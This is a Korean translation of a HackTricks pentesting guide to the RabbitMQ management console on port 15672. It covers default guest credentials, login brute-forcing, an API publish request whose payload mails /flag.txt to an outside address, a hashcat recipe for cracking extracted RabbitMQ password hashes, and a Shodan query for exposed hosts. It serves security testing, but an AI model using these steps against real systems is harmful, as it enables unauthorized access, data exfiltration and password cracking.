hacktricks/network-services-pentesting/15672-pentesting-rabbitmq-management.md

4.8 KiB

15672 - RabbitMQ 관리 Pentesting

htARTE (HackTricks AWS Red Team Expert)에서 AWS 해킹을 처음부터 전문가까지 배우세요!

HackTricks를 지원하는 다른 방법:

버그 바운티 팁: 해커들에 의해 만들어진 프리미엄 버그 바운티 플랫폼Intigriti가입하세요! 오늘 https://go.intigriti.com/hacktricks에서 참여하여 최대 $100,000의 바운티를 받으세요!

{% embed url="https://go.intigriti.com/hacktricks" %}

기본 정보

5671,5672 - AMQP Pentesting에서 RabbitMQ에 대해 더 알아볼 수 있습니다.
이 포트에서는 관리 플러그인이 활성화되어 있다면 RabbitMQ 관리 웹 콘솔을 찾을 수 있습니다.
주요 페이지는 다음과 같아야 합니다:

열거

기본 자격 증명은 "guest":"guest"입니다. 작동하지 않는 경우 로그인을 무력화해 볼 수 있습니다.

이 모듈을 수동으로 시작하려면 다음을 실행해야 합니다:

rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

인증을 올바르게 한 후에는 관리자 콘솔이 표시됩니다:

또한 유효한 자격 증명이 있다면 http://localhost:15672/api/connections의 정보가 흥미로울 수 있습니다.

또한 이 서비스의 API를 사용하여 요청으로 대기열 내에 데이터를 게시하는 것이 가능하다는 점에 유의하십시오:

POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}

해시 크래킹

echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist

Shodan

  • port:15672 http

버그 바운티 팁: Intigriti에 가입하여 해커들이 만든 프리미엄 버그 바운티 플랫폼에 참여하세요! https://go.intigriti.com/hacktricks에서 오늘 가입하고 최대 $100,000의 바운티를 받아보세요!

{% embed url="https://go.intigriti.com/hacktricks" %}

제로부터 히어로가 되기까지의 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법: